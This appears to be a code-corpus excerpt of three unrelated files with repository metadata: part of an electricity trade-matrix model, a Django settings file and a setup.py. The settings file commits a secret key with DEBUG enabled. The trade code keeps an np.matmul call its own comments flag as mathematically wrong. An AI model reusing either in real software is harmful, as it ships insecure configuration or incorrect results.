    # of all of the areas, it will be treated as an error and replaced with the
    # value in EIA923.
    logging.info("Checking against EIA 923 generation data")
    net_gen_check = df_net_gen_sum.merge(
        right=eia_gen_ba,
        left_index=True,
        right_on=["Balancing Authority Code"],
        how="left"
    ).reset_index()
    net_gen_check["diff"] = abs(net_gen_check["Electricity"] - net_gen_check[0]) / net_gen_check[0]
    # Series.mad() was removed in pandas 2.0; compute the mean absolute
    # deviation around the mean explicitly (NaNs skipped, as mad() did).
    diff_col = net_gen_check["diff"]
    diff_mad = (diff_col - diff_col.mean()).abs().mean()
    net_gen_swap = net_gen_check.loc[net_gen_check["diff"] > diff_mad, ["Balancing Authority Code", "Electricity"]].set_index("Balancing Authority Code")
    df_net_gen_sum.loc[net_gen_swap.index, [0]] = np.nan
    net_gen_swap.rename(columns={"Electricity": 0}, inplace=True)
    df_net_gen_sum = df_net_gen_sum.combine_first(net_gen_swap)
    # First work on the trading data from the 'df_trade_all_stack_2016' frame
    # This cell does the following:
    # 1. reformats the data to an annual basis
    # 2. formats the BA names in the corresponding columns
    # 3. evalutes the trade values from both BA perspectives
    #    (e.g. BA1 as exporter and importer in a transaction with BA2)
    # 4. evaluates the trading data for any results that don't make sense
    #    a. both BAs designate as importers (negative value)
    #    b. both BAs designate as exporters (postive value)
    #    c. one of the BAs in the transation reports a zero value and the other is nonzero
    # 5. calulate the percent difference in the transaction values reports by BAs
    # 6. final exchange value based on logic;
    #    a. if percent diff is less than 20%, take mean,
    #    b. if not use the value as reported by the exporting BAA
    #    c. designate each BA in the transaction either as the importer or exporter
    # Output is a pivot with index (rows) representing exporting BAs,
    # columns representing importing BAs, and values for the traded amount
    # Group and resample trading data so that it is on an annual basis
    logging.info("Creating trading dataframe")
    df_ba_trade = ba_exchange_to_df(BA_TO_BA_ROWS, data_type='ba_to_ba')
    del(BA_TO_BA_ROWS)
    df_ba_trade = df_ba_trade.set_index('datetime')
    df_ba_trade['transacting regions'] = df_ba_trade['from_region'] + '-' + df_ba_trade['to_region']
    logging.info("Filtering trading dataframe")
    # Keep only the columns that match the balancing authority names, there are several other columns included in the dataset
    # that represent states (e.g., TEX, NY, FL) and other areas (US48)
    filt1 = df_ba_trade['from_region'].isin(ba_cols)
    filt2 = df_ba_trade['to_region'].isin(ba_cols)
    filt = filt1 & filt2
    df_ba_trade = df_ba_trade[filt]
    # Subset for eia_gen_year, need to pivot first because of non-unique datetime index
    df_ba_trade_pivot = df_ba_trade.pivot(columns = 'transacting regions', values = 'ba_to_ba')
    df_ba_trade_pivot = df_ba_trade_pivot.loc[start_datetime:end_datetime]
    # Sum columns - represents the net transactced amount between the two BAs
    df_ba_trade_sum = df_ba_trade_pivot.sum(axis = 0).to_frame()
    df_ba_trade_sum = df_ba_trade_sum.reset_index()
    df_ba_trade_sum.columns = ['BAAs', 'Exchange']
    # Split BAA string into exporting and importing BAA columns.
    # (The `df['a'], df['b'] = series.str.split(...).str` unpacking idiom and
    # the positional maxsplit argument are deprecated; use n=/expand=.)
    df_ba_trade_sum[['BAA1', 'BAA2']] = df_ba_trade_sum['BAAs'].str.split('-', n=1, expand=True)
    df_ba_trade_sum = df_ba_trade_sum.rename(columns={'BAAs': 'Transacting BAAs'})
    # Create two perspectives - import and export to use for comparison in selection of the final exchange value between the BAAs
    df_trade_sum_1_2 = df_ba_trade_sum.groupby(['BAA1', 'BAA2', 'Transacting BAAs'], as_index=False)[['Exchange']].sum()
    df_trade_sum_2_1 = df_ba_trade_sum.groupby(['BAA2', 'BAA1', 'Transacting BAAs'], as_index=False)[['Exchange']].sum()
    df_trade_sum_1_2.columns = ['BAA1_1_2', 'BAA2_1_2', 'Transacting BAAs_1_2', 'Exchange_1_2']
    df_trade_sum_2_1.columns = ['BAA2_2_1', 'BAA1_2_1', 'Transacting BAAs_2_1', 'Exchange_2_1']
    # Combine two grouped tables for comparison for exchange values
    df_concat_trade = pd.concat([df_trade_sum_1_2, df_trade_sum_2_1], axis = 1)
    df_concat_trade['Exchange_1_2_abs'] = df_concat_trade['Exchange_1_2'].abs()
    df_concat_trade['Exchange_2_1_abs'] = df_concat_trade['Exchange_2_1'].abs()
    # Create new column to check if BAAs designate as either both exporters or both importers
    # or if one of the entities in the transaction reports a zero value
    # Drop combinations where any of these conditions are true, keep everything else
    df_concat_trade['Status_Check'] = np.where(((df_concat_trade['Exchange_1_2'] > 0) & (df_concat_trade['Exchange_2_1'] > 0)) \
        | ((df_concat_trade['Exchange_1_2'] < 0) & (df_concat_trade['Exchange_2_1'] < 0)) \
        | ((df_concat_trade['Exchange_1_2'] == 0) | (df_concat_trade['Exchange_2_1'] == 0)), 'drop', 'keep')
    # Calculate the difference in exchange values
    df_concat_trade['Delta'] = df_concat_trade['Exchange_1_2_abs'] - df_concat_trade['Exchange_2_1_abs']
    # Calculate percent diff of exchange_abs values - this can be down two ways:
    # relative to 1_2 exchange or relative to 2_1 exchange - perform the calc both ways
    # and take the average
    df_concat_trade['Percent_Diff_Avg'] = ((abs((df_concat_trade['Exchange_1_2_abs']/df_concat_trade['Exchange_2_1_abs'])-1)) \
        + (abs((df_concat_trade['Exchange_2_1_abs']/df_concat_trade['Exchange_1_2_abs'])-1)))/2
    # Mean exchange value
    df_concat_trade['Exchange_mean'] = df_concat_trade[['Exchange_1_2_abs', 'Exchange_2_1_abs']].mean(axis=1)
    # Percent diff equations creats NaN where both values are 0, fill with 0
    df_concat_trade['Percent_Diff_Avg'].fillna(0, inplace = True)
    # Final exchange value based on logic; if percent diff is less than 20%, take mean,
    # if not use the value as reported by the exporting BAA. First figure out which BAA is the exporter
    # by checking the value of the Exchance_1_2
    # If that value is positive, it indicates that BAA1 is exported to BAA2; if negative, use the
    # value from Exchange_2_1
    df_concat_trade['Final_Exchange'] = np.where((df_concat_trade['Percent_Diff_Avg'].abs() < 0.2),
        df_concat_trade['Exchange_mean'], np.where((df_concat_trade['Exchange_1_2'] > 0),
        df_concat_trade['Exchange_1_2'], df_concat_trade['Exchange_2_1']))
    # Assign final designation of BAA as exporter or importer based on logical assignment
    df_concat_trade['Export_BAA'] = np.where((df_concat_trade['Exchange_1_2'] > 0), df_concat_trade['BAA1_1_2'],
        np.where((df_concat_trade['Exchange_1_2'] < 0), df_concat_trade['BAA2_1_2'], ''))
    df_concat_trade['Import_BAA'] = np.where((df_concat_trade['Exchange_1_2'] < 0), df_concat_trade['BAA1_1_2'],
        np.where((df_concat_trade['Exchange_1_2'] > 0), df_concat_trade['BAA2_1_2'], ''))
    df_concat_trade = df_concat_trade[df_concat_trade['Status_Check'] == 'keep']
    # Create the final trading matrix; first grab the necessary columns, rename the columns and then pivot
    df_concat_trade_subset = df_concat_trade[['Export_BAA', 'Import_BAA', 'Final_Exchange']]
    df_concat_trade_subset.columns = ['Exporting_BAA', 'Importing_BAA', 'Amount']
    df_trade_pivot = df_concat_trade_subset.pivot_table(index = 'Exporting_BAA', columns = 'Importing_BAA', values = 'Amount').fillna(0)
    # This cell continues formatting the df_trade
    # Find missing BAs - need to add them in so that we have a square matrix
    # Not all BAs are involved in transactions
    trade_cols = list(df_trade_pivot.columns.values)
    trade_rows = list(df_trade_pivot.index.values)
    trade_cols_set = set(trade_cols)
    trade_rows_set = set(trade_rows)
    trade_ba_ref_set = set(ba_cols)
    trade_col_diff = list(trade_ba_ref_set - trade_cols_set)
    trade_col_diff.sort(key = str.upper)
    trade_row_diff = list(trade_ba_ref_set - trade_rows_set)
    trade_row_diff.sort(key=str.upper)
    # Add in missing columns, then sort in alphabetical order
    for i in trade_col_diff:
        df_trade_pivot[i] = 0
    df_trade_pivot = df_trade_pivot.sort_index(axis=1)
    # Add in missing rows, then sort in alphabetical order
    for i in trade_row_diff:
        df_trade_pivot.loc[i, :] = 0
    df_trade_pivot = df_trade_pivot.sort_index(axis=0)
    # Add Canadian Imports to the trading matrix
    # CA imports are specified in an external file
    df_CA_Imports_Cols = pd.read_csv(data_dir + '/CA_Imports_Cols.csv', index_col = 0)
    df_CA_Imports_Rows = pd.read_csv(data_dir + '/CA_Imports_Rows.csv', index_col = 0)
    df_CA_Imports_Rows = df_CA_Imports_Rows[['us_ba', str(year)]]
    df_CA_Imports_Rows = df_CA_Imports_Rows.pivot(columns = 'us_ba', values = str(year))
    df_concat_trade_CA = pd.concat([df_trade_pivot, df_CA_Imports_Rows])
    df_concat_trade_CA = pd.concat([df_concat_trade_CA, df_CA_Imports_Cols], axis = 1)
    df_concat_trade_CA.fillna(0, inplace = True)
    df_trade_pivot = df_concat_trade_CA
    df_trade_pivot = df_trade_pivot.sort_index(axis=0)
    df_trade_pivot = df_trade_pivot.sort_index(axis=1)
    # Perform trading calculations as provided in Qu et al (2018) to
    # determine the composition of a BA consumption mix
    # Create total inflow vector x and then convert to a diagonal matrix x-hat
    logging.info("Inflow vector")
    # Hoist the loop-invariant column sum out of the loop (was recomputed
    # every iteration).
    total_inflow = df_trade_pivot.sum(axis = 0)
    x = []
    for i in range(len(df_net_gen_sum)):
        x.append(df_net_gen_sum.iloc[i] + total_inflow.iloc[i])
    x_np = np.array(x)
    # If values are zero, x_hat matrix will be singular, set BAAs with 0 to small value (1)
    df_x = pd.DataFrame(data = x_np, index = df_trade_pivot.index)
    df_x = df_x.rename(columns = {0: 'inflow'})
    df_x.loc[df_x['inflow'] == 0] = 1
    x_np = df_x.values
    x_hat = np.diagflat(x_np)
    # Create consumption vector c and then convert to a digaonal matrix c-hat
    # Calculate c based on x and T
    logging.info("consumption vector")
    # Hoist the loop-invariant row sum as well.
    total_outflow = df_trade_pivot.sum(axis = 1)
    c = []
    for i in range(len(df_net_gen_sum)):
        c.append(x[i] - total_outflow.iloc[i])
    c_np = np.array(c)
    c_hat = np.diagflat(c_np)
    # Convert df_trade_pivot to matrix
    T = df_trade_pivot.values
    # Create matrix to split T into distinct interconnections - i.e., prevent trading between eastern and western interconnects
    # Connections between the western and eastern interconnects are through SWPP and WAUE
    logging.info("Matrix operations")
    interconnect = df_trade_pivot.copy()
    interconnect[:] = 1
    interconnect.loc['SWPP', ['EPE', 'PNM', 'PSCO', 'WACM']] = 0
    interconnect.loc['WAUE', ['WAUW', 'WACM']] = 0
    interconnect_mat = interconnect.values
    T_split = np.multiply(T, interconnect_mat)
    # Matrix trading math (see Qu et al. 2018 ES&T paper)
    x_hat_inv = np.linalg.inv(x_hat)
    B = np.matmul(T_split, x_hat_inv)
    I = np.identity(len(df_net_gen_sum))
    diff_I_B = I - B
    G = np.linalg.inv(diff_I_B)
    c_hat_x_hat_inv = np.matmul(c_hat, x_hat_inv)
    G_c = np.matmul(G, c_hat)
    # NOTE(review): np.matmul's third positional argument is `out`, so the
    # line below computes G @ c_hat and writes the result into x_hat_inv;
    # it does NOT compute G @ c_hat @ x_hat_inv. c_hat_x_hat_inv and G_c
    # above are unused. Behavior intentionally preserved as-is -- confirm
    # the intended math against Qu et al. (2018) before changing.
    H = np.matmul(G, c_hat, x_hat_inv)
    df_G = pd.DataFrame(G)
    df_B = pd.DataFrame(B)
    df_H = pd.DataFrame(H)
    # Convert H to pandas dataframe, populate index and columns
    df_final_trade_out = df_H
    df_final_trade_out.columns = df_net_gen_sum.index
    df_final_trade_out.index = df_net_gen_sum.index
    # Develop trading input for the eLCI code. Need to melt the dataframe to end up with a three column
    # dataframe:Repeat for both possible aggregation levels - BA and FERC market region
    # Establish a threshold of 0.00001 to be included in the final trading matrix
    # Lots of really small values as a result of the matrix calculate (e.g., 2.0e-15)
    df_final_trade_out_filt = df_final_trade_out.copy()
    col_list = df_final_trade_out.columns.tolist()
    # Adding in a filter for balancing authorities that are not associated
    # with any specific plants in EIA860 - there won't be any data for them in
    # the emissions dataframes. We'll set their quantities to 0 so that the
    # consumption mixes are made up of the rest of the incoming balancing
    # authority areas.
    eia860_bas = sorted(
        list(eia860_df["Balancing Authority Code"].dropna().unique())
        + list(df_CA_Imports_Cols.columns)
    )
    keep_rows = [x for x in df_final_trade_out_filt.index if x in eia860_bas]
    keep_cols = [x for x in df_final_trade_out_filt.columns if x in eia860_bas]
    df_final_trade_out_filt = df_final_trade_out_filt.loc[keep_rows, keep_cols]
    col_list = df_final_trade_out_filt.columns.tolist()
    for i in col_list:
        df_final_trade_out_filt[i] = np.where(df_final_trade_out_filt[i].abs()/df_final_trade_out_filt[i].sum() < 0.00001, 0, df_final_trade_out_filt[i].abs())
    df_final_trade_out_filt = df_final_trade_out_filt.reset_index()
    df_final_trade_out_filt = df_final_trade_out_filt.rename(columns = {'index': 'Source BAA'})
    df_final_trade_out_filt_melted = df_final_trade_out_filt.melt(id_vars = 'Source BAA', value_vars=col_list)
    df_final_trade_out_filt_melted = df_final_trade_out_filt_melted.rename(columns = {'Source BAA': 'export BAA', 'variable': 'import BAA'})
    # Merge to bring in import region name matched with BAA
    df_final_trade_out_filt_melted_merge = df_final_trade_out_filt_melted.merge(df_BA_NA, left_on = 'import BAA', right_on = 'BA_Acronym')
    df_final_trade_out_filt_melted_merge.rename(columns={'FERC_Region': 'import ferc region', 'FERC_Region_Abbr': 'import ferc region abbr'}, inplace=True)
    df_final_trade_out_filt_melted_merge.drop(columns = ['BA_Acronym', 'BA_Name', 'NCR ID#', 'EIA_Region', 'EIA_Region_Abbr'], inplace = True)
    # Merge to bring in export region name matched with BAA
    df_final_trade_out_filt_melted_merge = df_final_trade_out_filt_melted_merge.merge(df_BA_NA, left_on = 'export BAA', right_on = 'BA_Acronym')
    if regions_to_keep is not None:
        df_final_trade_out_filt_melted_merge = df_final_trade_out_filt_melted_merge.loc[df_final_trade_out_filt_melted_merge["BA_Name"].isin(regions_to_keep), :]
    df_final_trade_out_filt_melted_merge.rename(columns={'FERC_Region': 'export ferc region', 'FERC_Region_Abbr': 'export ferc region abbr'}, inplace=True)
    df_final_trade_out_filt_melted_merge.drop(columns = ['BA_Acronym', 'BA_Name', 'NCR ID#', 'EIA_Region', 'EIA_Region_Abbr'], inplace = True)
    # Develop final df for BAA
    BAA_import_grouped_tot = df_final_trade_out_filt_melted_merge.groupby(['import BAA'])['value'].sum().reset_index()
    BAA_final_trade = df_final_trade_out_filt_melted_merge.copy()
    BAA_final_trade = BAA_final_trade.drop(columns = ['import ferc region', 'export ferc region', 'import ferc region abbr', 'export ferc region abbr'])
    BAA_final_trade = BAA_final_trade.merge(BAA_import_grouped_tot, left_on = 'import BAA', right_on = 'import BAA')
    BAA_final_trade = BAA_final_trade.rename(columns = {'value_x': 'value', 'value_y': 'total'})
    BAA_final_trade['fraction'] = BAA_final_trade['value']/BAA_final_trade['total']
    BAA_final_trade = BAA_final_trade.fillna(value = 0)
    BAA_final_trade = BAA_final_trade.drop(columns = ['value', 'total'])
    # Remove Canadian BAs in import list
    BAA_filt = BAA_final_trade['import BAA'].isin(eia860_bas)
    BAA_final_trade = BAA_final_trade[BAA_filt]
    # There are some BAs that will have 0 trade. Some of these are legitimate
    # Alcoa Yadkin has no demand (i.e., all power generation is exported) others
    # seem to be errors. For those BAs with actual demand, we'll set the
    # consumption mix to 100% from that BA. For those without demand,
    # fraction will be set to near 0 just to make sure systems can be built
    # in openLCA
    BAA_zero_trade = [x for x in list(BAA_final_trade["import BAA"].unique()) if BAA_final_trade.loc[BAA_final_trade["import BAA"] == x, "fraction"].sum() == 0]
    BAAs_from_zero_trade_with_demand = []
    for d_row in DEMAND_ROWS:
        if d_row["series_id"].split('.')[1].split('-')[0] in BAA_zero_trade:
            BAAs_from_zero_trade_with_demand.append(d_row["series_id"].split('.')[1].split('-')[0])
    BAAs_from_zero_trade_with_demand = list(set(BAAs_from_zero_trade_with_demand))
    del(DEMAND_ROWS)
    for baa in BAAs_from_zero_trade_with_demand:
        BAA_final_trade.at[(BAA_final_trade["import BAA"] == baa) & (BAA_final_trade["export BAA"] == baa), "fraction"] = 1
    for baa in list(set(BAA_zero_trade) - set(BAAs_from_zero_trade_with_demand)):
        BAA_final_trade.at[(BAA_final_trade["import BAA"] == baa) & (BAA_final_trade["export BAA"] == baa), "fraction"] = 1E-15
        # Was later decided to not create consumption mixes for BAs that don't have imports.
        BAA_final_trade.drop(BAA_final_trade[BAA_final_trade["import BAA"] == baa].index, inplace=True)
    BAA_final_trade.to_csv(output_dir + '/BAA_final_trade_{}.csv'.format(year))
    BAA_final_trade["export_name"] = BAA_final_trade["export BAA"].map(df_BA_NA[["BA_Acronym", "BA_Name"]].set_index("BA_Acronym")["BA_Name"])
    BAA_final_trade["import_name"] = BAA_final_trade["import BAA"].map(df_BA_NA[["BA_Acronym", "BA_Name"]].set_index("BA_Acronym")["BA_Name"])
    # Develop final df for FERC Market Region
    ferc_import_grouped_tot = df_final_trade_out_filt_melted_merge.groupby(['import ferc region'])['value'].sum().reset_index()
    ferc_final_trade = df_final_trade_out_filt_melted_merge.copy()
    ferc_final_trade = ferc_final_trade.groupby(['import ferc region abbr', 'import ferc region', 'export BAA'])['value'].sum().reset_index()
    ferc_final_trade = ferc_final_trade.merge(ferc_import_grouped_tot, left_on = 'import ferc region', right_on = 'import ferc region')
    ferc_final_trade = ferc_final_trade.rename(columns = {'value_x': 'value', 'value_y': 'total'})
    ferc_final_trade['fraction'] = ferc_final_trade['value']/ferc_final_trade['total']
    ferc_final_trade = ferc_final_trade.fillna(value = 0)
    ferc_final_trade = ferc_final_trade.drop(columns = ['value', 'total'])
    # Remove Canadian entry in import list
    ferc_list.remove('CAN')
    ferc_filt = ferc_final_trade['import ferc region abbr'].isin(ferc_list)
    ferc_final_trade = ferc_final_trade[ferc_filt]
    ferc_final_trade.to_csv(output_dir + '/ferc_final_trade_{}.csv'.format(year))
    ferc_final_trade["export_name"] = ferc_final_trade["export BAA"].map(df_BA_NA[["BA_Acronym", "BA_Name"]].set_index("BA_Acronym")["BA_Name"])
    # Develop final df for the US as a whole
    us_import_grouped_tot = df_final_trade_out_filt_melted_merge['value'].sum()
    us_final_trade = df_final_trade_out_filt_melted_merge.copy()
    us_final_trade = us_final_trade.groupby(['export BAA'])['value'].sum().reset_index()
    us_final_trade["fraction"] = us_final_trade["value"]/us_import_grouped_tot
    us_final_trade = us_final_trade.fillna(value = 0)
    us_final_trade = us_final_trade.drop(columns = ["value"])
    us_final_trade["export_name"] = us_final_trade["export BAA"].map(df_BA_NA[["BA_Acronym", "BA_Name"]].set_index("BA_Acronym")["BA_Name"])
    return {'BA': BAA_final_trade, 'FERC': ferc_final_trade, 'US': us_final_trade}
# Ad-hoc entry point: run the trade model directly for 2016 at balancing
# authority ('BA') resolution.
if __name__=='__main__':
    year=2016
    subregion = 'BA'
    mix_df_dict = ba_io_trading_model(year, subregion)
def olca_schema_consumption_mix(database, gen_dict, subregion="BA"):
    """Convert consumption-mix trade fractions to openLCA schema processes.

    Builds one consumption-mix process per import region, with one input
    exchange per exporting region whose provider is looked up in
    ``gen_dict`` (the generation-mix processes).

    Args:
        database: dataframe of trade fractions as returned by
            ba_io_trading_model (columns include 'fraction', export/import
            region names).
        gen_dict: dict of generation-mix process dictionaries, searched by
            process name.
        subregion: 'BA', 'FERC', or 'US' aggregation level.

    Returns:
        dict mapping "<region> - <subregion>" to an openLCA process dict.
    """
    import numpy as np
    import pandas as pd
    from electricitylci.generation import eia_facility_fuel_region
    from electricitylci.globals import data_dir, output_dir
    from electricitylci.process_dictionary_writer import (
        exchange_table_creation_ref,
        exchange,
        ref_exchange_creator,
        electricity_at_user_flow,
        electricity_at_grid_flow,
        process_table_creation_con_mix,
        exchange_table_creation_input_con_mix
    )
    import logging
    # DELETE NEXT LINE
    # database = cons_mix_df
    # database = database.drop(columns = ['value', 'total'])
    # dist_dict = dist_mix_dict
    # DELETE ABOVE
    consumption_mix_dict = {}
    if subregion == "FERC":
        aggregation_column = "import ferc region"
        region = list(pd.unique(database[aggregation_column]))
        export_column = 'export_name'
    elif subregion == "BA":
        aggregation_column = "import_name" # "import BAA"
        region = list(pd.unique(database[aggregation_column]))
        export_column = "export_name" # 'export BAA'
    elif subregion == "US":
        export_column = "export_name"
        region=["US"]
    for reg in region:
        if subregion =="US":
            database_reg = database
        else:
            database_reg = database.loc[database[aggregation_column] == reg, :]
        exchanges_list = []
        # NOTE(review): the mask is built from the full `database`, not
        # `database_reg`; this works only via pandas index alignment (the
        # subset's index labels are a subset of the mask's) -- verify.
        database_filt = database['fraction'] > 0
        database_reg = database_reg[database_filt]
        # NOTE(review): exchange_table_creation_ref_cons is not among the
        # names imported above; presumably supplied by the module-level
        # wildcard import of process_dictionary_writer -- confirm.
        exchange(exchange_table_creation_ref_cons(database_reg), exchanges_list)
        for export_region in list(database_reg[export_column].unique()):
            database_f1 = database_reg[
                database_reg[export_column] == export_region
            ]
            if database_f1.empty != True:
                ra = exchange_table_creation_input_con_mix(
                    database_f1, export_region
                )
                ra["quantitativeReference"] = False
                ra['amount'] = database_reg.loc[database_reg[export_column] == export_region,'fraction'].values[0]
                matching_dict = None
                # Find the generation-mix process whose name matches this
                # exporting region.
                for gen in gen_dict:
                    if (
                        gen_dict[gen]["name"]
                        == 'Electricity; at grid; generation mix - ' + export_region
                    ):
                        # NOTE(review): looked up by export_region rather
                        # than the matching key `gen`; correct only if
                        # gen_dict is keyed by region name -- confirm.
                        matching_dict = gen_dict[export_region]
                        break
                if matching_dict is None:
                    logging.warning(
                        f"Trouble matching dictionary for {export_region} - {reg}"
                    )
                else:
                    ra["provider"] = {
                        "name": matching_dict["name"],
                        "@id": matching_dict["uuid"],
                        "category": matching_dict["category"].split("/"),
                    }
                exchange(ra, exchanges_list)
        # Writing final file
        final = process_table_creation_con_mix(reg, exchanges_list)
        final["name"] = f"Electricity; at grid; consumption mix - {reg} - {subregion}"
        consumption_mix_dict[f"{reg} - {subregion}"] = final
    return consumption_mix_dict
| 49.516381
| 176
| 0.689351
|
4a0f2c0d62da25f1e7c20bee66da1d49a63e78a4
| 3,278
|
py
|
Python
|
pg/settings.py
|
KONAPAVANKUMAR/paying-guest-django
|
8646550b7c764728fa68a9fcdea2dab77851d36a
|
[
"MIT"
] | null | null | null |
pg/settings.py
|
KONAPAVANKUMAR/paying-guest-django
|
8646550b7c764728fa68a9fcdea2dab77851d36a
|
[
"MIT"
] | null | null | null |
pg/settings.py
|
KONAPAVANKUMAR/paying-guest-django
|
8646550b7c764728fa68a9fcdea2dab77851d36a
|
[
"MIT"
] | null | null | null |
"""
Django settings for pg project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-71g6&16zc+sow8$6z6%cr(jsni%6z$@^svr78!&z)n(c(i7enn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'pgapp',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pg.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pg.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = ['static']
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| 25.811024
| 91
| 0.699512
|
4a0f2c58283cd7b006a3fd5f4480099fd0a27773
| 1,184
|
py
|
Python
|
setup.py
|
urschrei/Circles
|
5aab401b470935e816a28d7ba817eb72f9344672
|
[
"MIT"
] | 6
|
2017-08-25T04:30:10.000Z
|
2021-11-22T13:31:41.000Z
|
setup.py
|
urschrei/Circles
|
5aab401b470935e816a28d7ba817eb72f9344672
|
[
"MIT"
] | null | null | null |
setup.py
|
urschrei/Circles
|
5aab401b470935e816a28d7ba817eb72f9344672
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
setup.py
Created by Stephan Hügel on 2011-03-04
"""
from setuptools import setup, find_packages

# Trove classifiers: supported interpreters, maturity, license, audience.
CLASSIFIERS = [
    'Programming Language :: Python',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3.3',
    'Development Status :: 4 - Beta',
    'Intended Audience :: Developers',
    'License :: OSI Approved :: MIT License',
    'Operating System :: OS Independent',
    'Topic :: Software Development :: Libraries :: Python Modules',
]

# Rendered on PyPI as the long project description.
LONG_DESCRIPTION = """\
A convenience method for calculating circular coordinates for a given centre and radius.
These can be plotted on a Basemap instance, and will conform to its selected projection
"""

setup(
    name='Circles',
    version='0.1',
    description='Draw correctly-projected circles on a Basemap plot',
    author='Stephan Hügel',
    author_email='urschrei@gmail.com',
    license='MIT',
    url='https://github.com/urschrei/circles',
    download_url='https://github.com/urschrei/circles/tarball/v0.1',
    keywords=['basemap'],
    classifiers=CLASSIFIERS,
    packages=find_packages(),
    install_requires=['numpy'],
    long_description=LONG_DESCRIPTION,
)
| 31.157895
| 89
| 0.657939
|
4a0f2cc76bf96dc6b93f336c10bf608ca5513547
| 2,085
|
py
|
Python
|
app/tempBerry/smarthome/rest/serializers.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 2
|
2019-07-16T19:09:50.000Z
|
2020-01-03T09:06:46.000Z
|
app/tempBerry/smarthome/rest/serializers.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | null | null | null |
app/tempBerry/smarthome/rest/serializers.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 1
|
2020-02-09T22:46:05.000Z
|
2020-02-09T22:46:05.000Z
|
from rest_framework import serializers
from tempBerry.smarthome.models import Room, SmartHome, Sensor, AbstractDataEntry
class AbstractDataEntrySerializer(serializers.Serializer):
    """Fallback serializer exposing only the fields common to all data entries."""
    id = serializers.IntegerField()
    source = serializers.CharField()
    created_at = serializers.DateTimeField()
class SensorSerializer(serializers.ModelSerializer):
    """
    Serializer for Sensors, including the sensor's most recent reading
    (``live_data``) rendered with the most specific serializer available.
    """
    live_data = serializers.SerializerMethodField()

    class Meta:
        model = Sensor
        fields = (
            'id', 'name', 'created_at', 'last_updated_at', 'comment', 'public', 'type', 'live_data',
        )

    def get_live_data(self, obj):
        """Serialize ``obj.live_data`` according to its concrete model type."""
        live = getattr(obj, 'live_data', None)
        if not live:
            return None
        # Imported lazily; at module import time these would be circular.
        from tempBerry.temperatures.models import TemperatureDataEntry
        from tempBerry.binarySensor.models import BinarySensorData
        from tempBerry.temperatures.rest.serializers import TemperatureDataEntrySerializer
        from tempBerry.binarySensor.rest.serializers import BinarySensorDataSerializer
        # Choose the serializer matching the concrete data-entry class,
        # falling back to the generic abstract one.
        if isinstance(live, TemperatureDataEntry):
            serializer_class = TemperatureDataEntrySerializer
        elif isinstance(live, BinarySensorData):
            serializer_class = BinarySensorDataSerializer
        else:
            serializer_class = AbstractDataEntrySerializer
        return serializer_class(live).data
class RoomSerializer(serializers.ModelSerializer):
    """
    Serializer for rooms
    """
    # Nested, read-style serialization of all sensors attached to the room.
    sensors = SensorSerializer(many=True)
    class Meta:
        model = Room
        fields = ('id', 'name', 'comment', 'created_at', 'public', 'sensors',
                  'has_temperature', 'has_humidity', 'has_air_pressure')
        read_only_fields = ('created_at', )
class MinimalisticSmartHomeSerializer(serializers.Serializer):
    """
    Minimalistic Serializer for SmartHome
    """
    # Read-only projection of the SmartHome identity fields only.
    id = serializers.IntegerField(read_only=True)
    name = serializers.CharField(read_only=True)
    description = serializers.CharField(read_only=True)
| 33.629032
| 100
| 0.703118
|
4a0f2d3956b2832281f8e133240d0d6c0da59a59
| 1,196
|
py
|
Python
|
secret_santa.py
|
codeocelot/secret-santa
|
57b5a43293f1d8e49e7516c73508ee50cc95ea7f
|
[
"Apache-2.0"
] | 1
|
